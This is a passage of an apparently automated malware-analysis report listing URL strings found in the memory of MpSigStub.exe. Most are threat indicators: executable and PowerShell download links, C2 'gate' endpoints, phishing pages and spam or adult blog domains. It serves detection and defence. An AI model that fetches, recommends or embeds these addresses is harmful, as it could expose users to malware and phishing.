Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://beruijindegunhadesun.com/ktmcheck.exe
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1http://rezultsd.info/cd/cd.php?id=%s&ver=ig1http://carren
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=ERROR&ver=ig1
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://bestsoll.com/forum/go.php?sid=2
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://bfb3c.21a8b.j4fbs.k876c575n.v48796e.f5.nbdc.y7.v2da8e4kt.drovemeetings.in/
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://bibliaamada.org/counter.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://bibliotecasgc.bage.es/cgi-bin/koha/tracklinks.pl?uri=https://huerm-brib-0b902c.netlify.app#ke
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/1r9mffb)
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/28jsjnq)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cobwhj)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cokxeu)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2df4jbx)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2h3fi0m)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2hload25ydu19
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2jg4gfn)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2kud4md)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2p8qtra)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2q93tca)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://bitzroid.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://black43.ars.0manko.jp/set_inf.php?id=movies.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/gate
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/success
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://blacksun.phpnet.us/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://blank-record.com/cgi-bin/search?id=
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://blessedindia.org/9ifuurhgwq
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://bln8225.casacam.net/zxqjhjubakff/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://blog.daum.net/ahahvideo
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://bloodybits.com/edwinjefferson.com/ie_xo/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://blufda.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://bnpost.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://bogle.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bollyinthon.com/docusign/doc/home/index.php)
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://bonkersmen.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://book4u-free.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://boomdakai.tk/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bootreading.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://bopdu.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bornonthescene.com/purchase/kill.php?ten=fingers)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://boscumix.com/optima/index.php
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bosengaptek.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://boss.orda.icu/mailb.php
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://bot.cjfeeds.com
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bousalemfoot.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://brazzerslove.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://brilhosefascinios.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: http://brokentools.xyz/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://brotherunited.cf/.start/yxblcmv6qgnhcm5pdmfslmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://browsetosave.info
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bugs.clamav.net
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://busco-mujeres.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://businesswebapp.com/realtors/wp-admin/js/jb/login%20pdf.html)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://butterchoco.net/admin/bull/gate.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://buy.haote.com/?
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://buydomainnameuk.com/img/pole.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://bytecoin.tk/m/svchosts.exe
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://c2quocoaidateh.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://c4.faceb00k.com:8888/files/run2.ps1
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://caferestaurantnador.com/wp-includes/0onjp/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://calastargate.net/y82rtzbz.php?id=1484429
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://calendar.cjishu.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://californianlondon.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://calux123.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://canadahalalec.com/b685cf9fdc885f90abbb39b13022d1c4.php?q=
Source: MpSigStub.exe, 00000024.00000003.6276060761.00000197A46BC000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
Source: MpSigStub.exe, 00000024.00000003.6298673850.00000197A43C2000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/3
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://capers07.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://capsnit.com
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://captinads.com/oldtest/page.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://cargohl.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://carsgirlssexy.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://casaalberti.com/wp-content/files_mf/2/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://cassia89.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://catell.ru/set.js
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://cbadenoche.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://cbl.toolbar4free.com/cgi-bin/s.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.che.moe/ymufnn.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=126
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=130
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://ceaircelle76.org/2.php?configklvar=1
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://centralcarqocn.com/fax/fe.doc
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://cert.beahh.com/cert.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
